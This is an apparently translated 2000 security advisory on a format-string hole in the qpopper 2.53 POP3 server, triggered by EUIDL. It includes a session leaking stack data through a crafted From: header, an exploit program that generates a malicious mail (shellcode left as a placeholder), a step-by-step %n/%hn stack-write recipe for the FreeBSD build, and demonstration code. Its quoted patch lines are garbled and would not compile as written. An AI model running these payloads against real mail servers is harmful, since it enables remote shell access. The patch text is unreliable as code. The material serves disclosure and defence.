Obtaining a shell remotely through qpopper 2.53
Created at: 2000-05-27
Article attributes: original
Article submission: Quack (quack_at_xfocus.org)
Obtaining a shell remotely through qpopper 2.53
By quack
Reference: Buffer0verflow Security advisory #5 by prizm
* Brief description
Qpopper is a widely used POP3 server that lets users read their mail with a POP3 client.
It is commonly used for mail service on standard UNIX systems.
* Problem
In qpopper 2.53 this bug lets a remote user obtain a shell with gid=mail.
The problem is a format-string bug around pop_msg(): the reply line assembled in pop_uidl.c from message headers is passed to pop_msg() as its format string, and it is triggered by the EUIDL command. Let's look at the qpopper 2.53 code:
Code 2.53:
--> pop_uidl.c, line 150:
................
        sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
        if (nl = index(buffer, NEWLINE)) *nl = 0;
        sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
!       return (pop_msg(p, POP_SUCCESS, buffer));
                                        ^
.................
In pop_msg.c, pop_msg() is declared as pop_msg(POP *p, int stat, const char *format, ...), so `buffer` becomes the format string.
That buffer holds the message's X-UIDL and From: headers, i.e. text chosen by whoever sent the mail :)
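To make the bug concrete, here is an added stand-in for the EUIDL reply path. It is not qpopper's code: pop_msg_stub(), euidl_reply(), euidl_demo(), count_percent() and MAXLINELEN are names chosen for this demonstration, and the From: header is constructed. It uses only "%%", the one conversion that consumes no argument, so both the 2.53-style call and the fixed call stay well-defined here; the real bug hands %p and %n whatever happens to be on the stack.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define POP_SUCCESS 1
#define POP_FAILURE 0
#define MAXLINELEN  1024      /* assumed reply buffer size for this stand-in */

/* Stand-in for qpopper's pop_msg(): prefix "+OK " or "-ERR ", then run the
 * caller's FORMAT through the printf engine. Bounded with vsnprintf() like the
 * FreeBSD port; the stock 2.53 build used vsprintf() into a stack buffer. */
static int pop_msg_stub(char *reply, size_t size, int stat, const char *format, ...)
{
    va_list ap;
    size_t used;
    int n;

    snprintf(reply, size, "%s ", stat == POP_SUCCESS ? "+OK" : "-ERR");
    used = strlen(reply);
    va_start(ap, format);
    n = vsnprintf(reply + used, size - used, format, ap);
    va_end(ap);
    return n;
}

/* Build the EUIDL reply "<msg_id> <uidl> <length> <from>" the way pop_uidl.c
 * does (From: is capped at 128 bytes by "%.128s"), then hand it to pop_msg().
 * `vulnerable` selects the 2.53 call (the assembled line IS the format) or
 * the fixed call (the line is a "%s" argument). */
int euidl_reply(char *reply, size_t size, int vulnerable,
                int msg_id, const char *uidl, long length, const char *from)
{
    char buffer[MAXLINELEN];
    char line[MAXLINELEN];
    char *nl;

    snprintf(buffer, sizeof buffer, "%d %s", msg_id, uidl);
    if ((nl = strchr(buffer, '\n')) != NULL)
        *nl = '\0';
    /* qpopper sprintf()s into `buffer` while also reading it as %s; a second
     * buffer is used here so the demonstration stays well-defined. */
    snprintf(line, sizeof line, "%s %ld %.128s", buffer, length, from);

    if (vulnerable)
        return pop_msg_stub(reply, size, POP_SUCCESS, line);        /* attacker text is the format */
    return pop_msg_stub(reply, size, POP_SUCCESS, "%s", line);      /* the one-token fix */
}

/* Convenience wrapper: the same constructed message (id 3, 16-byte UIDL,
 * 530 octets) through either call style, returned from a static buffer. */
const char *euidl_demo(int vulnerable, const char *from)
{
    static char reply[MAXLINELEN];
    euidl_reply(reply, sizeof reply, vulnerable, 3, "aaaaaaaaaaaaaaaa", 530, from);
    return reply;
}

/* Cheap server-side or mail-filter check: a From: header has no business
 * carrying conversion specifiers. Returns the number of '%' bytes found. */
int count_percent(const char *s)
{
    int n = 0;
    for (; *s; s++)
        if (*s == '%')
            n++;
    return n;
}

int main(void)
{
    /* Constructed From: header; "%%" is the only conversion that consumes no
     * argument, so even the vulnerable path stays defined for this demo. */
    const char *from = "still trust qpop? 100%% sure";

    printf("2.53 call : %s\n", euidl_demo(1, from));   /* "%%" collapses to "%" */
    printf("fixed call: %s\n", euidl_demo(0, from));   /* text passes through untouched */
    printf("From: carries %d '%%' byte(s)\n", count_percent(from));
    return 0;
}
```

The only visible difference for "%%" is one character, but that difference proves the header went through the printf engine as a format; substitute %p or %n and the same path reads and writes the stack, as the session below shows.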
Now, let's imagine the following SMTP session (server replies shown with their codes):
mail from:<anyone>
250 OK
rcpt to:<luser@host.withqpop253.com>
250 OK
data
354 okey, okey. End with "."
Subject: still trust QPOP? =/
X-UIDL: aaaaaaaaaaaaaaaa
From: %p%p%p%p%p%p%p
test
.
250 blablabla OK, message accepted for delivery.
Then the user luser connects to his POP account and runs the EUIDL command:
+OK QPOP (version 2.53) at b0f starting.  <666.666@b0f>
user luser
+OK Password required for luser.
pass secret
+OK luser has 3 messages (1644 octets).
euidl 3
+OK 2 aaaaaaaaaaaaaaaa 530 0xbfbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfd1e80x8057028
Yeah, that's from my box with FreeBSD. As you can see, our %p's were interpreted as arguments by vsnprintf().
* Exploitation
Can this be exploited? Yes, of course!
But there is a small catch: qpopper 2.53 on FreeBSD is harder to exploit than on Linux, because
the FreeBSD port changes the vsprintf() call in pop_msg.c to vsnprintf(), so an oversized expansion no longer overflows the stack buffer.
A significant difference, but of course it can still be exploited :)
Exploitation Program
--------
/* qpop_euidl.c exploit by prizm/Buffer0verflow Security
 *
 * Sample exploit for buffer overflow in qpopper 2.53.
 * This little proggie generates a mail u need to send.
 *
 * Standard disclaimer applies.
 * By the way, exploit is broken =) You need to insert shellcode.
 *
 * Mad greets to tf8 for pointing out the bug, and all other b0f members.
 * Greets to ussrlabs and ADM
 * Check http://b0f.freebsd.lublin.pl/ for news.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Placeholder: real shellcode (12 to 76 bytes, see the check below) goes here. */
char shellcode[] = "imnothing";

int main(int argc, char *argv[])
{
    int i;
    unsigned long ra = 0;

    if (argc != 2) {
        fprintf(stderr, "Usage: %s return_addr\n", argv[0]);
        exit(0);
    }
    sscanf(argv[1], "%lx", &ra);
    if (!ra)
        return 1;
    if (sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
        fprintf(stderr, "Bad shellcode\n");
        exit(0);
    }
    fprintf(stderr, "Return address: 0x%.8lx\n", ra);

    /* X-UIDL: carries the shellcode; qpopper copies it into the reply buffer on the stack. */
    printf("X-UIDL: ");
    for (i = 0; i < sizeof(shellcode); i++)
        printf("%c", shellcode[i]);
    printf("\r\n");

    /* From: "%.1000d" expands to 1000 bytes once the reply is used as the format,
     * overflowing the vsprintf() buffer in pop_msg(); the 50 little-endian copies
     * of the return address then land on the saved return address. */
    printf("From: %s", "%.1000d");
    for (i = 0; i < 50; i++)
        printf("%c%c%c%c", (int)(ra & 0xff), (int)((ra & 0xff00) >> 8),
               (int)((ra & 0xff0000) >> 16), (int)((ra & 0xff000000) >> 24));
    printf("@test\r\n");
    printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
    return 0;
}
Using the QPOP port on FreeBSD
---------------------
This is not easy, because vsprintf() has been replaced by vsnprintf(), so the "%.1000d" expansion cannot overflow the buffer in pop_msg(). But we
can still take control, remember %n? The idea is as follows.
Here is the trick with %n. Look at the following code: can you see why it prints 2000
instead of sizeof(b)?
--- <cut> ---
#include <stdio.h>

int main(void)
{
    int s = 1;          /* sentinel beside the buffer: still 1 if nothing overflowed */
    char b[1024];
    int q;

    snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
    return printf("%d, overflowed? %s\n", q, (s == 1 ? "no" : "yes"));
}
--- </cut> ---
On my FreeBSD 3.4 machine, I got the following result:
2000, overflowed? no
Hey, at first I expected to see 1024, but you know, sometimes a program's behaviour is not what you predict. (C99 defines %n in snprintf() as the number of characters that would have been written had the buffer been unlimited, so the size bound stops the overflow but not the %n write.) The following may help:
Exploiting it:
 a) Locate the exact position of the user's input on the stack.
 b) Compose a message with X-UIDL and From: fields like this:
    X-UIDL: ppRETARETARETARETA.
    From: <shellcode>%.RETURNd%n@test
    where:
     "pp" is padding (two or three bytes) so the addresses that follow fall on 4-byte argument boundaries
     "RETA" is the address %n will write through (the saved return address), repeated so that %n picks its pointer argument up from the X-UIDL copy on the stack
     "shellcode" - guess ;)
     "RETURN" is the value to be written, i.e. the address the function should return to (your shellcode), given as the precision so that %n has counted that many characters
 c) If you need a working exploit for the FreeBSD version, do it yourself :)
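The steps above rest on one property: with vsnprintf() the output is bounded, but %n still stores the full count. Here is an added example, not from the advisory, that shows that write primitive in isolation. The target pointer is passed explicitly instead of being found on the stack as step a) requires, and the write is split into two %hn half-writes so that each precision stays below 65536 (a 32-bit RETURN of 0xbfbfc9b0 written with a single %n would need a precision of about three billion). word_t, write32_via_n() and demo_write() are names chosen for this demonstration; the union type-punning is deliberate.

```c
#include <stdio.h>

/* A 32-bit word viewed as two 16-bit halves so each %hn can target one half. */
typedef union {
    unsigned int u32;
    short s16[2];
} word_t;

/* Index of the half that holds the low-order 16 bits (0 on little-endian). */
static int low_half_index(void)
{
    word_t probe;
    probe.u32 = 1;
    return probe.s16[0] == 1 ? 0 : 1;
}

/* Store `value` into *target through snprintf()'s %hn while writing into a
 * 64-byte buffer. The precisions are never limited by that buffer: %n records
 * how many characters would have been emitted, which is exactly why the
 * FreeBSD port's vsnprintf() does not close the hole. Returns the count
 * snprintf() reports, i.e. the larger of the two half values. */
int write32_via_n(word_t *target, unsigned int value)
{
    char out[64];
    int lo = low_half_index();
    unsigned int lo_v = value & 0xffffU;
    unsigned int hi_v = (value >> 16) & 0xffffU;
    short *first_ptr, *second_ptr;
    int first_prec, second_prec;

    /* %n counts cumulatively, so emit the smaller half first and then only
     * the difference for the second one. */
    if (lo_v <= hi_v) {
        first_ptr   = &target->s16[lo];      first_prec  = (int)lo_v;
        second_ptr  = &target->s16[1 - lo];  second_prec = (int)(hi_v - lo_v);
    } else {
        first_ptr   = &target->s16[1 - lo];  first_prec  = (int)hi_v;
        second_ptr  = &target->s16[lo];      second_prec = (int)(lo_v - hi_v);
    }
    /* "%.*d" of the value 0 prints exactly `precision` zeros, and none at all
     * when the precision is 0, so the counts come out exact. */
    return snprintf(out, sizeof out, "%.*d%hn%.*d%hn",
                    first_prec, 0, first_ptr, second_prec, 0, second_ptr);
}

/* Run the primitive against a fresh zeroed word and return what it now holds. */
unsigned int demo_write(unsigned int value)
{
    word_t w;
    w.u32 = 0;
    write32_via_n(&w, value);
    return w.u32;
}

int main(void)
{
    /* Constructed target value: the stack address seen in the %p leak above. */
    unsigned int want = 0xbfbfc9b0U;
    unsigned int got = demo_write(want);

    printf("wanted 0x%08x, wrote 0x%08x through a 64-byte snprintf()\n", want, got);
    return got == want ? 0 : 1;
}
```

In the real attack the two pointers are not passed as arguments; they are the RETA words placed in X-UIDL, which vsnprintf() reads from the stack as if they were arguments, and the two %hn writes would then need two such addresses (RETA and RETA+2).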
* Versions with Vulnerabilities
2.53 (What about others? Not sure ......)
* Patch
You can download qpopper 3.1 from http://www.eudora.com/freeware/qpop.html#current
where this problem has been fixed.
Or you can patch the source yourself:
at lines 150 and 62 of pop_uidl.c, change:
-Return (pop_msg (p, pop_success, buffer ));
To:
+ Return (pop_msg (p, pop_success, "% s", buffer ));
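Review bot: the "%s" change is the right fix at both call sites, since the user-derived line becomes an argument instead of the format, but the line just above it, sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp)), still passes buffer as both the destination and a %s source, which the C standard leaves undefined for overlapping objects; format into a second buffer (or build the whole line with one snprintf() call) while you are there, and keep the ".128" precision so from_hdr() cannot make the line overrun the pop_msg() buffer in the vsprintf() build.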